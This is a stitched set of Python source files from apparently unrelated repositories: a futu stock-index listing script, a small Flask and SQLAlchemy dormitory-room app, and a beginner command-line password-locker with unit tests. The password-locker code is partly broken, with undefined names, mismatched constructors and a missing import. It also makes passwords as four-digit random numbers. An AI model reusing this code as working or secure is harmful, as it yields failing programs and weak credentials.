40 US..DJUSDN 道琼斯美国国防指数
41 US..DJUSDR 道琼斯美国食品和药物零售商指数
42 US..DJUSDS 道琼斯美国工业供应商指数
43 US..DJUSDT "Dow Jones US Diversified REITs
"
44 US..DJUSDV 道琼斯美国计算机服务指数
45 US..DJUSEC 道琼斯美国电气元件及设备指数
46 US..DJUSEE 道琼斯美国电子电气设备指数
47 US..DJUSEH 道琼斯美国房地产控股与发展指数
48 US..DJUSEN 道琼斯美国石油和天然气指数
49 US..DJUSES 道琼斯美国房地产服务指数
50 US..DJUSEU 道琼斯美国电力指数
51 US..DJUSFA "Dow Jones US Financial Administration Index
"
52 US..DJUSFB 道琼斯美国食品和饮料指数
53 US..DJUSFC 道琼斯美国固定电话电讯指数
54 US..DJUSFD 道琼斯美国食品零售商和批发商指数
55 US..DJUSFE 道琼斯美国工业机械指数
56 US..DJUSFH 道琼斯美国家具指数
57 US..DJUSFI 道琼斯美国金融服务指数
58 US..DJUSFN 道琼斯美国金融指数
59 US..DJUSFO 道琼斯美国食品生产商指数
60 US..DJUSFP 道琼斯美国食品指数
61 US..DJUSFR 道琼斯美国林业与纸业指数
62 US..DJUSFT 道琼斯美国鞋业指数
63 US..DJUSFV 道琼斯美国金融服务综合指数
64 US..DJUSGF 道琼斯美国通用财务指数
65 US..DJUSGI 道琼斯美国通用工业指数
66 US..DJUSGL "Dow Jones US Large-Cap Growth Index
"
67 US..DJUSGM "Dow Jones US Mid-Cap Growth Index
"
68 US..DJUSGR 道琼斯美国增长指数
69 US..DJUSGS "Dow Jones US Small-Cap Growth Index
"
70 US..DJUSGT 道琼斯美国综合零售商指数
71 US..DJUSGU 道琼斯美国天然气分布指数
72 US..DJUSHB 道琼斯美国家居建筑指数
73 US..DJUSHC 道琼斯美国医疗保健指数
74 US..DJUSHD 道琼斯美国耐用家用产品指数
75 US..DJUSHG 道琼斯美国家庭用品指数
76 US..DJUSHI 道琼斯美国家居零售商指数
77 US..DJUSHL "Dow Jones US Hotel & Lodging REITs Index
"
78 US..DJUSHN 道琼斯美国无保障住户产品指数
79 US..DJUSHP 道琼斯美国医疗保健提供者指数
80 US..DJUSHR 道琼斯美国商用车辆和卡车指数
81 US..DJUSHV 道琼斯美国重型建筑指数
82 US..DJUSIB 道琼斯美国保险经纪人指数
83 US..DJUSID 道琼斯美国多元化工业指数
84 US..DJUSIF 道琼斯美国全线保险指数
85 US..DJUSIG 道琼斯美国工业产品与服务
86 US..DJUSIL 道琼斯美国人寿保险指数
87 US..DJUSIM 道琼斯美国工业金属指数
88 US..DJUSIN 道琼斯美国工业指数
89 US..DJUSIO 道琼斯美国工业和房地产信托指数
90 US..DJUSIP 道琼斯美国财险保险指数
91 US..DJUSIQ 道琼斯美国工业工程指数
92 US..DJUSIR 道琼斯美国保险指数
93 US..DJUSIS 道琼斯美国支持服务指数
94 US..DJUSIT 道琼斯美国工业交通指数
95 US..DJUSIU 道琼斯美国再保险指数
96 US..DJUSIV 道琼斯美国商业支持服务指数
97 US..DJUSIX 道琼斯美国非人寿保险指数
98 US..DJUSL 道琼斯美国大盘指数
99 US..DJUSLE 道琼斯美国休闲用品指数
100 US..DJUSLG 道琼斯美国酒店指数
101 US..DJUSLTR "Dow Jones US Large-Cap TR Index (EOD)
"
102 US..DJUSLW "Dow Jones US Low Cap Index
"
103 US..DJUSM "Dow Jones US Mid Cap Index
"
104 US..DJUSMC 道琼斯美国医疗保健设备及服务指数
105 US..DJUSME 道琼斯美国媒体指数
106 US..DJUSMF 道琼斯美国抵押贷款融资指数
107 US..DJUSMG 道琼斯美国矿业指数
108 US..DJUSMR 道琼斯美国抵押房地产信托指数
109 US..DJUSMS 道琼斯美国医疗用品指数
110 US..DJUSMT 道琼斯美国海运交通指数
111 US..DJUSMU 道琼斯美国多功能指数
112 US..DJUSNC 道琼斯美国消费品指数
113 US..DJUSNF 道琼斯美国有色金属指数
114 US..DJUSNG 道琼斯美国个人及家庭用品指数
115 US..DJUSNS 道琼斯美国互联网指数
116 US..DJUSOE 道琼斯美国电子办公设备指数
117 US..DJUSOG 道琼斯美国石油和天然气生产商指数
118 US..DJUSOI 道琼斯美国石油设备与服务指数
119 US..DJUSOL 道琼斯美国综合油气指数
120 US..DJUSOQ 道琼斯美国石油设备,服务与分销指数
121 US..DJUSOS 道琼斯美国勘探与生产指数
122 US..DJUSPB 道琼斯美国出版指数
123 US..DJUSPC 道琼斯美国废物处理服务指数
124 US..DJUSPG 道琼斯美国个人商品指数
125 US..DJUSPL 道琼斯美国管道指数
126 US..DJUSPM 道琼斯美国黄金矿业指数
127 US..DJUSPN 道琼斯美国制药与生物技术指数
128 US..DJUSPP 道琼斯美国纸业指数
129 US..DJUSPR 道琼斯美国医药指数
130 US..DJUSPT 道琼斯美国铂金与贵金属指数
131 US..DJUSRA 道琼斯美国服装零售商指数
132 US..DJUSRB "Dow Jones US Broadline Retailers Index
"
133 US..DJUSRD 道琼斯美国药物零售商指数
134 US..DJUSRE "Dow Jones US Real Estate Index
"
135 US..DJUSRH 道琼斯美国房地产投资与服务指数
136 US..DJUSRI 道琼斯美国房地产投资信托指数
137 US..DJUSRL "Dow Jones US Retail REITs Index
"
138 US..DJUSRN "Dow Jones US Residential REITs Index
"
139 US..DJUSRP 道琼斯美国娱乐产品指数
140 US..DJUSRQ 道琼斯美国娱乐服务指数
141 US..DJUSRR 道琼斯美国铁路指数
142 US..DJUSRS 道琼斯美国专业零售商指数
143 US..DJUSRT 道琼斯美国零售指数
144 US..DJUSRU 道琼斯美国餐馆和酒吧指数
145 US..DJUSS "Dow Jones US Small Cap Index
"
146 US..DJUSSB 道琼斯美国投资服务公司
147 US..DJUSSC 道琼斯美国半导体指数
148 US..DJUSSD 道琼斯美国软饮料指数
149 US..DJUSSF 道琼斯美国消费者金融指数
150 US..DJUSSP 道琼斯美国专业金融指数
151 US..DJUSSR "Dow Jones US Specialty REITs Index
"
152 US..DJUSST 道琼斯美国钢铁指数
153 US..DJUSSV 道琼斯美国软件与计算机服务指数
154 US..DJUSSW 道琼斯美国软件指数
155 US..DJUSTB 道琼斯美国烟草指数
156 US..DJUSTC 道琼斯美国高科技指数
157 US..DJUSTK 道琼斯美国卡车指数
158 US..DJUSTL 道琼斯美国电讯指数
159 US..DJUSTP "Dow Jones US Top Cap Index
"
160 US..DJUSTQ 道琼斯美国技术五金设备指数
161 US..DJUSTR 道琼斯美轮胎指数
162 US..DJUSTS 道琼斯美国运输服务指数
163 US..DJUSTT 道琼斯美国旅游与旅游指数
164 US..DJUSTY 道琼斯美国玩具指数
165 US..DJUSUO "Dow Jones US Gas"
166 US..DJUSUT 道琼斯美国公用事业指数
167 US..DJUSVA 道琼斯美国价值指数
168 US..DJUSVE 道琼斯美国常规电力指数
169 US..DJUSVL "Dow Jones US Large-Cap Value Index
"
170 US..DJUSVM "Dow Jones US Mid-Cap Value Index
"
171 US..DJUSVN 道琼斯美国酿酒商与葡萄酒指数
172 US..DJUSVS "Dow Jones US Small-Cap Value Index
"
173 US..DJUSWC 道琼斯美国移动通信指数
174 US..DJUSWU 道琼斯美国水资源指数
175 US..INX 标普500指数
176 US..NDX 纳斯达克100
177 US..SP100 标普100指数
178 US..SPCMI 标普完整指数
179 US..W5000FLT "Wilshire 5000 Total Market Index
"
180 US..W5KLC "Wilshire US Large Cap
"
181 US..W5KMC "Wilshire US Mid Cap
"
182 US..W5KMICRO "Wilshire US Micro Cap
"
183 US..W5KSC "Wilshire US Small Cap
"
184 US..AEX 荷兰AEX指数
185 US..AS51 澳大利亚指数
186 US..ASE 希腊指数
187 US..ATX 奥地利指数
188 US..BEL20 比利时指数
189 US..CAC 法国指数
190 US..CASE 埃及指数
191 US..CSEALL 斯里兰卡指数
192 US..DAX 德国DAX指数
193 US..FBMKLC 马来西亚指数
194 US..FSSTI 新加坡指数
195 US..FTSEMIB 意大利指数
196 US..HEX 芬兰指数
197 US..IBEX 西班牙指数
198 US..IBOV 巴西指数
199 US..ICEXI 冰岛指数
200 US..INDEXCF 俄罗斯指数
201 US..ISEQ 爱尔兰指数
202 US..JCI 印尼综合指数
203 US..KFX 丹麦指数
204 US..kospi 韩国指数
205 US..KSE100 巴基斯坦指数
206 US..LUXXX 卢森堡指数
207 US..MEXBOL 墨西哥指数
208 US..NKY 日经225指数
209 US..NZSE50FG 新西兰指数
210 US..OBX 挪威指数
211 US..OMX 瑞典OMX指数
212 US..PCOMP 菲律宾指数
213 US..PX 捷克指数
214 US..SENSEX 印度孟买指数
215 US..SET 泰国指数
216 US..SMI 瑞士市场指数
217 US..SPTSX 加拿大指数
218 US..TWSE 台湾加权指数
219 US..UKX 英国指数
220 US..VNINDEX 越南指数
221 US..WIG 波兰指数
'''
def enum_all_index(ip, port):
    """Dump the index (IDX) security list of every supported market to disk.

    Opens a futu OpenQuoteContext against the quote server at ``ip``/``port``,
    fetches basic info for all index-type securities per market, and writes one
    space-separated ``code name`` file per market (index_sh.txt, index_sz.txt,
    index_hk.txt, index_us.txt).

    Fixes over the original: the four copy-pasted fetch/save stanzas are folded
    into one loop, and the context is closed in a ``finally`` so a failed fetch
    no longer leaks the connection.
    """
    quote_ctx = ft.OpenQuoteContext(ip, port)
    try:
        # (market enum, output file, label used in the progress message)
        jobs = [
            (ft.Market.SH, "index_sh.txt", "SH"),
            (ft.Market.SZ, "index_sz.txt", "SZ"),
            (ft.Market.HK, "index_hk.txt", "HK"),
            (ft.Market.US, "index_us.txt", "US"),
        ]
        for market, filename, label in jobs:
            ret, data_frame = quote_ctx.get_stock_basicinfo(market=market, stock_type=ft.SecurityType.IDX)
            data_frame.to_csv(filename, index=True, sep=' ', columns=['code', 'name'])
            print('market %s index data saved!' % label)
    finally:
        quote_ctx.close()
def get_index_stocks(ip, port, code):
    """Return ``(ret, data_frame)`` listing the constituent stocks of index *code*."""
    ctx = ft.OpenQuoteContext(ip, port)
    result, frame = ctx.get_plate_stock(code)
    ctx.close()
    return result, frame
if __name__ == "__main__":
    # Quote-server (futu gateway) connection settings.
    api_ip = '192.168.127.12' #''192.168.127.12'
    api_port = 11111
    # enum_all_index(api_ip, api_port)
    # Smoke test: print the constituents of one well-known index per market.
    print('SH.000001 上证指数 \n')
    print(get_index_stocks(api_ip, api_port, 'SH.000001'))
    print('SZ.399006 创业板指\n')
    print(get_index_stocks(api_ip, api_port, 'SZ.399006'))
    print('HK.800000 恒生指数 \n')
    print(get_index_stocks(api_ip, api_port, 'HK.800000'))
    print('US..DJI 道琼斯指数\n')
    print(get_index_stocks(api_ip, api_port, 'US..DJI'))
|
neil-vqa/firekeep | firekeep/models.py | class MaximumNumberOfOccupantsReached(Exception):
pass
class Tenant:
    """A dormitory tenant identified by name and student ID number."""

    def __init__(self, first_name: str, last_name: str, student_id_number: int) -> None:
        self.first_name = first_name
        self.last_name = last_name
        self.student_id_number = student_id_number

    @property
    def full_name(self) -> str:
        """Return the tenant's display name.

        Fix: the original concatenated first and last name with no separator
        (producing e.g. ``"NeilAlino"`` in error messages); join with a space.
        """
        return f"{self.first_name} {self.last_name}"
class Room:
    """A room with a fixed maximum capacity and a set of current occupants."""

    def __init__(self, room_number: str, max_capacity: int) -> None:
        self.room_number = room_number
        self.max_capacity = max_capacity
        self.occupants = set()

    @property
    def number_of_occupants(self) -> int:
        """Count of tenants currently occupying the room."""
        return len(self.occupants)

    @property
    def can_add_more_occupants(self) -> bool:
        """True while the room is below its maximum capacity."""
        return self.number_of_occupants < self.max_capacity

    def add_occupant(self, occupant: Tenant):
        """Add *occupant*; raise MaximumNumberOfOccupantsReached when full."""
        if not self.can_add_more_occupants:
            raise MaximumNumberOfOccupantsReached
        self.occupants.add(occupant)
def assign_to_room(tenant: Tenant, room: Room):
    """Place *tenant* into *room*.

    Re-raises MaximumNumberOfOccupantsReached with a human-readable message
    naming the tenant and room when the room is already at max capacity.
    """
    try:
        room.add_occupant(tenant)
    except MaximumNumberOfOccupantsReached:
        # Re-raise the same exception type, enriched with context for callers.
        raise MaximumNumberOfOccupantsReached(
            f"Can no longer add {tenant.full_name} to Room {room.room_number}."
        )
|
neil-vqa/firekeep | firekeep/__init__.py | __version__ = "0.1.0"
from .app import app
|
neil-vqa/firekeep | firekeep/app.py | from flask import Flask, jsonify, request
from flask_cors import CORS
from firekeep import orm, services
from firekeep.db_session import Session
from firekeep.keep import RoomCreate, RoomResponse, TenantCreate, TenantResponse, keep
app = Flask(__name__)
cors = CORS(app, resources={r"/api/*": {"origins": "*"}})
orm.run_mappers()
@app.get("/api/tenants")
@keep(response_model=TenantResponse)
def get_tenant_list():
    """Return a hard-coded sample list of tenants as JSON."""
    fields = ("first_name", "last_name", "student_id_number", "id")
    rows = [
        ("jefford", "librado", 951, 1),
        ("eds", "decena", 753, 2),
    ]
    tenants = [dict(zip(fields, row)) for row in rows]
    return jsonify(tenants)
@app.get("/api/tenants/<int:id>")
@keep(response_model=TenantResponse)
def get_tenant(id: int):
    """Return a hard-coded sample tenant for the given *id* as JSON."""
    tenant = dict(
        first_name="wins",
        last_name="sabellona",
        student_id_number=963,
        id=id,
    )
    return jsonify(tenant)
@app.post("/api/rooms")
@keep(response_model=RoomResponse, request_model=RoomCreate)
def create_room():
    """Echo the validated room payload back, stamped with a dummy id."""
    payload = request.json
    payload["id"] = 951
    return payload
@app.post("/api/assign")
def assign_tenant():
    """Assign a tenant to a room via the service layer.

    Expects a JSON body with ``room_number``, ``room_id`` and ``tenant_id``.

    Fix: the original wrapped the call in ``try: ... except Exception: raise``,
    which is a no-op; errors now propagate to Flask's error handling directly
    with identical behavior.
    """
    msg = services.assign_tenant_to_room(
        request.json["room_number"],
        request.json["room_id"],
        request.json["tenant_id"],
        Session(),
    )
    return jsonify(msg)
|
neil-vqa/firekeep | firekeep/keep.py | <filename>firekeep/keep.py
"""
This module contains the keep function, and classes that mirror the domain models.
The keep function is to be used as a decorator for view functions, and is provided with
appropriate response and request models.
The purpose of building this is to act as the first line of defense against the request data,
and the final layer of check for outgoing data in the response.
"""
import functools
from typing import Callable, List, Optional, Set, Type
from flask import abort, after_this_request, jsonify, request
from pydantic import BaseModel, ValidationError, parse_obj_as
from firekeep.models import Room
# Mirrored models from the domain inherit from this class. Sets global config.
class PydanticBase(BaseModel):
    """Shared base for the mirrored request/response models."""

    class Config:
        extra = "forbid"  # reject payload keys not declared on the model
class TenantBaseModel(PydanticBase):
    """Fields common to all tenant payloads."""

    first_name: str
    last_name: str
    student_id_number: int


class TenantResponse(TenantBaseModel):
    """Outgoing tenant representation (adds the database id)."""

    id: int

    class Config:
        extra = "ignore"  # set to avoid conflict with extra fields that the ORM might return


class TenantCreate(TenantBaseModel):
    """Incoming payload for creating a tenant; same fields as the base."""
    pass
class RoomBaseModel(PydanticBase):
    """Fields common to all room payloads."""

    room_number: str
    max_capacity: int


class RoomResponse(RoomBaseModel):
    """Outgoing room representation, including its occupant set."""

    # NOTE(review): Set[...] requires hashable members; pydantic models are
    # not hashable by default — confirm TenantResponse hashes as intended.
    occupants: Set[TenantResponse]

    class Config:
        extra = "ignore"


class RoomCreate(RoomBaseModel):
    """Incoming payload for creating a room together with its occupants."""

    occupants: Set[TenantCreate]
def keep(
    response_model: Optional[Type[BaseModel]],
    request_model: Optional[Type[BaseModel]] = None,
) -> Callable:
    """Decorator factory validating request/response JSON against pydantic models.

    ``request_model`` (when given) is applied to the incoming JSON before the
    view runs; ``response_model`` is applied to the outgoing JSON via Flask's
    ``after_this_request`` hook. Validation failures abort with HTTP 400.

    NOTE(review): the response-side validation runs after the view returns,
    outside this ``try`` — confirm a ValidationError raised there is handled
    as intended rather than surfacing as a 500.
    """
    def parser(func) -> Callable:
        @functools.wraps(func)
        def parse_with_pydantic_wrapper(*args, **kwargs):
            try:
                if request_model:
                    request_model(**request.json)  # parsing the request data
                @after_this_request
                def parse_response(response):
                    # check if response is a collection
                    if isinstance(response.json, list):
                        # Validate each element, then re-serialize the list.
                        response_as_list_parsed = parse_obj_as(
                            List[response_model], response.json
                        )
                        response_as_list_validated = [
                            item.dict() for item in response_as_list_parsed
                        ]
                        return jsonify(response_as_list_validated)
                    else:
                        response_validated = response_model(**response.json)
                        return jsonify(response_validated.dict())
                return func(*args, **kwargs)
            except ValidationError as e:
                return abort(400, description=e)
        return parse_with_pydantic_wrapper
    return parser
|
neil-vqa/firekeep | tests/test_firekeep.py | from firekeep.models import (
MaximumNumberOfOccupantsReached,
Room,
Tenant,
assign_to_room,
)
import pytest
def test_assign_tenant_to_room():
    """A tenant assigned to a non-full room ends up in its occupant set."""
    tenant = Tenant("Neil", "Alino", 20120065)
    room = Room("GF-001", 5)
    assign_to_room(tenant, room)
    assert tenant in room.occupants
def test_raise_max_number_of_occupants_reached_if_cannot_assign():
    """Assigning past a room's max capacity raises the domain error."""
    tenants = [
        Tenant("Neil", "Alino", 20120065),
        Tenant("Jefford", "Librado", 20120055),
        Tenant("Ed", "Decena", 20120045),
        Tenant("Wins", "Sabellona", 20120035),
    ]
    # Capacity 2 < 4 tenants: the third assignment must raise.
    room = Room("1F-001", 2)
    with pytest.raises(MaximumNumberOfOccupantsReached):
        for tenant in tenants:
            assign_to_room(tenant, room)
|
neil-vqa/firekeep | firekeep/config.py | import os
from typing import Optional
def get_postgres_uri() -> Optional[str]:
    """Return the PostgreSQL connection URI from the environment, or None."""
    return os.environ.get("POSTGRES_DB_URI")
def get_sqlite_uri() -> str:
    """Return the fixed SQLite URI used for local development and tests."""
    uri = "sqlite:///test.db"
    return uri
|
neil-vqa/firekeep | firekeep/services.py | from typing import Any
from sqlalchemy.orm import Session
def assign_tenant_to_room(
    room_number: str, room_id: int, tenant_id: int, session_object: Session
) -> Any:
    """Service-layer stub for assigning a tenant to a room.

    NOTE(review): placeholder implementation — opens a session, prints the
    room number for debugging, and echoes ``(room_number, tenant_id)`` back;
    ``room_id`` is currently unused and nothing is persisted.
    """
    with session_object as session:
        print(room_number)
        return room_number, tenant_id
|
neil-vqa/firekeep | firekeep/repository.py | import abc
from firekeep.models import Room
class AbstractBaseRepository(abc.ABC):
    """Port/interface for room persistence (repository pattern)."""

    @abc.abstractmethod
    def get(self, room_number: str):
        """Fetch a room by its room number."""
        raise NotImplementedError

    @abc.abstractmethod
    def assign(self, room: Room):
        """Persist the given room's state."""
        raise NotImplementedError
class SQLAlchemyRepository(AbstractBaseRepository):
    """SQLAlchemy-backed repository.

    NOTE(review): both operations are unimplemented stubs that silently
    return None — implement them before use.
    """

    def __init__(self, session) -> None:
        self.session = session

    def get(self, room_number: str):
        pass

    def assign(self, room: Room):
        pass
|
neil-vqa/firekeep | firekeep/db_session.py | <filename>firekeep/db_session.py
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from firekeep import config
engine = create_engine(config.get_sqlite_uri())
Session = sessionmaker(engine)
|
neil-vqa/firekeep | firekeep/orm.py | from sqlalchemy import Column, MetaData, Table
from sqlalchemy.orm import registry, relationship
from sqlalchemy.sql.schema import ForeignKey
from sqlalchemy.sql.sqltypes import Integer, String
from firekeep.models import Room, Tenant
# Imperative-mapping setup: classic Table definitions mapped onto the plain
# domain classes from firekeep.models (see run_mappers below).
mapper_registry = registry()
metadata_obj = MetaData()
# Rooms: one row per physical room.
room_table = Table(
    "room",
    metadata_obj,
    Column("id", Integer, primary_key=True),
    Column("room_number", String(8)),
    Column("max_capacity", Integer),
)
# Tenants: each tenant optionally belongs to one room via the room_id FK.
tenant_table = Table(
    "tenant",
    metadata_obj,
    Column("id", Integer, primary_key=True),
    Column("first_name", String(20)),
    Column("last_name", String(20)),
    Column("student_id_number", Integer),
    Column("room_id", Integer, ForeignKey("room.id")),
)
def run_mappers():
    """Wire the domain classes to their tables (SQLAlchemy imperative mapping).

    ``Room.occupants`` becomes a relationship of Tenant rows, with a ``room``
    backref added to Tenant. Intended to be called once at startup.
    """
    mapper_registry.map_imperatively(
        Room, room_table, properties={"occupants": relationship(Tenant, backref="room")}
    )
    mapper_registry.map_imperatively(Tenant, tenant_table)
|
Shavolski/Password-Locker | run.py | from user import User
from credentials import Credentials
import random
def greetings():
    """Print the ASCII-art banner shown at program start."""
    print(" __ __ ")
    print(" /\ /\ | | | | ")
    print("| | | | ________ | | | | _____ ")
    print("| |____| | | ___ | | | | | / \ ")
    print("| ____ | | |___| | | | | | | ___ | ")
    print("| | | | | ______| | |__ | |__ | |___| | ")
    print("| | | | | |______ | | | | | | ")
    print(" \/ \/ \_______/ \_____/ \____/ \_____/ ")
# Show the banner immediately when the script runs.
greetings()
def password (password):
    '''
    Function to rewrite the Value error to make it easier to understand
    '''
    # NOTE(review): despite the name, this prompts the user for input and
    # parses it as an integer; the *password* parameter is ignored. On invalid
    # input it returns an error STRING instead of raising, so callers cannot
    # distinguish the message from a real value — confirm intended behavior.
    print("Create new password ")
    try:
        number = int(input())
        return number
    except ValueError:
        return "That was not a valid input"
def create_contact(fname, lname, password, email):
    '''
    Function to create a new contact
    '''
    # NOTE(review): user.User.__init__ (user.py) accepts only first/last name,
    # so this 4-argument call raises TypeError as written. Also, main() calls
    # an undefined ``create_user`` — it presumably means this function.
    new_user = User(fname, lname, password, email)
    return new_user
def save_user(user):
    '''
    Function to save user
    '''
    # Thin wrapper delegating to the instance's own save method.
    user.save_user()
def del_user():
    '''
    Function to delete a user
    '''
    # NOTE(review): ``contact`` is not defined anywhere in this module, so
    # calling this raises NameError. It presumably should take the user to
    # delete as a parameter and call user.delete_user() on it.
    contact.delete_user()
def find_user(password):
    '''
    Function that finds a user by number and returns the user
    '''
    # NOTE(review): user.py's User defines find_by_name but no
    # find_by_password — this call raises AttributeError as written.
    return User.find_by_password(password)
def check_existing_user(password):
    '''
    Function that check if a user exists with that password and return a Boolean
    '''
    # NOTE(review): User.user_exist (user.py) matches on first_name rather
    # than password, and internally references an undefined name — verify.
    return User.user_exist(password)
def display_user():
    '''
    Function that returns all the saved user
    '''
    # NOTE(review): ``user`` is not defined in this scope and the User class
    # defines no display_user method — calling this raises NameError. It
    # presumably should return User.user_list.
    return user.display_user()
def main():
    """Interactive loop: create, list and look up users via short codes.

    Fixes over the original:
    - ``create_user`` and ``display_users`` were undefined names (NameError);
      the code now calls :func:`create_contact` and reads ``User.user_list``
      directly for the listing branch.
    - the generated ``random_number`` is now actually used as the password
      (the original passed the module-level ``password`` function object).
    """
    print("...........Whatsup Huuuumaaan?.This is the place where I, the bot, make passwords for you. What is your name?...........")
    user_name = input()
    print(f"........Waddup {user_name}. my master (Developer) wants me to assist you in making a user account.......")
    print('\n')
    while True:
        print(
            "Yo human...Use these short codes to walk through around my master's app : cu - create a new user, dc - display user, fc -find a user, ex -exit the user list")
        short_code = input().lower()
        if short_code == 'cu':
            print("...............New User.............")
            print("-"*10)
            print("-"*10)
            print("...............Pop up your First name...............")
            f_name = input()
            print("-"*10)
            print("...............Pop up your Last name...............")
            l_name = input()
            print("-"*10)
            print("..................Let me do the magic in making your Password................")
            random_number = random.randint(1000,9999)
            print(random_number)
            print("-"*10)
            print(".................Email address..................")
            e_address = input()
            print("-"*10)
            print("-"*10)
            # create and save new contact (password is the generated number).
            save_user(create_contact(f_name, l_name, random_number, e_address))
            print('\n')
            print(f"New User {f_name} {l_name} created")
            print('\n')
        elif short_code == 'dc':
            if User.user_list:
                print("Here is a list of all your user")
                print('\n')
                # NOTE(review): User instances expose first/last name only;
                # the ``password`` attribute printed here is not set by
                # user.py's User.__init__ — confirm against user.py.
                for user in User.user_list:
                    print(
                        f"{user.first_name} {user.last_name} .....{user.password}")
                print('\n')
            else:
                print('\n')
                print(
                    "you don't have any")
                print('\n')
        elif short_code == 'fc':
            print("Enter the password you want to search for")
            search_password = input()
            if check_existing_user(search_password):
                search_user = find_user(
                    search_password)
                print(
                    f"{search_user.first_name} {search_user.last_name}")
                print('-' * 20)
                print(
                    f"Password.......{search_user.password}")
                print(
                    f"Email address.......{search_user.email}")
            else:
                print("Again I don't get it")
        elif short_code == "ex":
            print("Adios!.......")
            break
        else:
            print(
                "I'm a bot I can't. PLEASE use the short codes")
if __name__ == '__main__':
main()
|
Shavolski/Password-Locker | credentials.py | import random
class Credentials:
    """
    Class that generates new instances of credentials
    """

    # All saved credentials, shared across the class.
    credentials_list = []

    def __init__(self, password, email):
        # Fix: the original also created a dead local ``credentials_list``
        # inside __init__; it shadowed nothing and was never used.
        self.password = password
        self.email = email

    def save_credentials(self):
        '''
        save_credentials method saves objects into credentials_list
        '''
        Credentials.credentials_list.append(self)

    def delete_credentials(self):
        '''
        delete_credentials method deletes a saved credentials from the credentials_list
        '''
        Credentials.credentials_list.remove(self)

    @classmethod
    def find_by_password(cls, password):
        '''
        Method that takes in a password and returns the first credentials
        entry whose password matches, or None when no entry matches.
        '''
        for credentials in cls.credentials_list:
            if credentials.password == password:
                return credentials

    @classmethod
    def credentials_exist(cls, password):
        '''
        Method that checks if a credentials entry with the given password
        exists in credentials_list.

        Returns:
            Boolean: True or False depending on whether the entry exists.
        '''
        for credentials in cls.credentials_list:
            if credentials.password == password:
                return True
        return False

    @classmethod
    def display_credentials(cls):
        '''
        Method that returns the full credentials_list.
        '''
        return cls.credentials_list

    @classmethod
    def copy_email(cls, password):
        '''
        Copy the email of the credentials matching *password* to the clipboard.

        Fix: the original referenced an undefined local ``credentials_found``;
        the lookup is now performed explicitly.
        NOTE(review): ``pyperclip`` is used but never imported in this module;
        add ``import pyperclip`` at the top of the file (test.py already
        depends on it).
        '''
        credentials_found = cls.find_by_password(password)
        pyperclip.copy(credentials_found.email)
|
Shavolski/Password-Locker | user.py | import random
class User:
    """
    Class that generates new instances of users
    """

    # All saved users, shared across the class.
    user_list = []

    def __init__(self, first_name, last_name):
        # Fix: removed the dead local ``contact_list = []`` the original
        # created here; it was never used.
        self.first_name = first_name
        self.last_name = last_name

    def save_user(self):
        '''
        save_user method saves user objects into user_list
        '''
        User.user_list.append(self)

    def delete_user(self):
        '''
        delete_user method deletes a saved user from the user_list
        '''
        User.user_list.remove(self)

    @classmethod
    def find_by_name(cls, name):
        '''
        Return the first user whose first name matches *name*, or None.

        Fix: the original compared against an undefined ``first_name`` local,
        raising NameError on any call.
        '''
        for user in cls.user_list:
            if user.first_name == name:
                return user

    @classmethod
    def user_exist(cls, name):
        '''
        Return True when a user with first name *name* has been saved.

        Fix: same undefined ``first_name`` bug as find_by_name.
        '''
        for user in cls.user_list:
            if user.first_name == name:
                return True
        return False

    @classmethod
    def display_users(cls):
        '''
        Return the full user_list.

        Added for parity with Credentials.display_credentials — run.py and
        test.py already call this name (backward-compatible addition).
        '''
        return cls.user_list
|
Shavolski/Password-Locker | test.py | <filename>test.py
import unittest
import pyperclip
from user import User
from credentials import Credentials
class TestUser(unittest.TestCase):
    '''
    Test class that defines test cases for the user class behaviours.

    Args:
        unittest.TestCase: TestCase class that helps in creating test cases.
    '''

    def setUp(self):
        '''
        Set up method to run before each test case.
        '''
        self.new_user = User("Steve", "Wachira")

    def tearDown(self):
        '''
        tearDown method that does clean up after each test case has run.
        '''
        User.user_list = []

    def test_init(self):
        '''
        test_init test case to test if the object is initialized properly
        '''
        self.assertEqual(self.new_user.first_name, "Steve")
        self.assertEqual(self.new_user.last_name, "Wachira")

    def test_save_user(self):
        '''
        test_save_user test case to test if the user object is saved into the user_list
        '''
        # Fix: the original called self.new_user(), which is not callable.
        self.new_user.save_user()
        self.assertEqual(len(User.user_list), 1)

    def test_save_multiple_user(self):
        '''
        test_save_multiple_user check if we can save multiple user objects to our user_lists
        '''
        self.new_user.save_user()
        test_user = User("Test", "user")
        test_user.save_user()
        self.assertEqual(len(User.user_list), 2)

    def test_delete_user(self):
        '''
        test_delete_user to test if we can remove a user from our user_list
        '''
        self.new_user.save_user()
        test_user = User("Test", "user")
        test_user.save_user()
        self.new_user.delete_user()
        self.assertEqual(len(User.user_list), 1)

    def test_find_user_by_name(self):
        '''
        test to check if we can find a user by name and display information
        '''
        self.new_user.save_user()
        test_user = User("Test", "user")
        test_user.save_user()
        # Fix: the original called User.first_name("Steve") (an attribute,
        # not a finder) and a one-argument assertEqual.
        found_user = User.find_by_name("Steve")
        self.assertEqual(found_user.first_name, "Steve")

    def test_user_exists(self):
        '''
        test to check if we can return a Boolean if we cannot find the contact.
        '''
        self.new_user.save_user()
        test_user = User("Test", "user")
        test_user.save_user()
        user_exists = User.user_exist("Steve")
        self.assertTrue(user_exists)

    def test_display_all_user(self):
        '''
        method that returns a list of all users saved
        '''
        # NOTE(review): requires a User.display_users classmethod (see user.py).
        self.assertEqual(User.display_users(), User.user_list)
#This is the test for the credentials
class TestCredentials(unittest.TestCase):
    '''
    Test class that defines test cases for the credentials class behaviours.

    Args:
        unittest.TestCase: TestCase class that helps in creating test cases.
    '''

    def setUp(self):
        '''
        Set up method to run before each test case.
        '''
        self.new_credentials = Credentials("1244", "<EMAIL>")

    def tearDown(self):
        '''
        tearDown method that does clean up after each test case has run.
        '''
        Credentials.credentials_list = []

    def test_init(self):
        '''
        test_init test case to test if the object is initialized properly
        '''
        # Fix: the expected password now matches the value set in setUp
        # (the original compared against an anonymization placeholder).
        self.assertEqual(self.new_credentials.password, "1244")
        self.assertEqual(self.new_credentials.email, "<EMAIL>")

    def test_save_credentials(self):
        '''
        test_save_credentials test case to test if the object is saved into credentials_list
        '''
        # Fix: the original called self.new_credentials(), which is not callable.
        self.new_credentials.save_credentials()
        self.assertEqual(len(Credentials.credentials_list), 1)

    def test_save_multiple_credentials(self):
        '''
        test_save_multiple_credentials check if we can save multiple credentials objects
        '''
        self.new_credentials.save_credentials()
        test_credentials = Credentials("1244", "<EMAIL>")
        test_credentials.save_credentials()
        self.assertEqual(len(Credentials.credentials_list), 2)

    def test_delete_credentials(self):
        '''
        test_delete_credentials to test if we can remove an entry from credentials_list
        '''
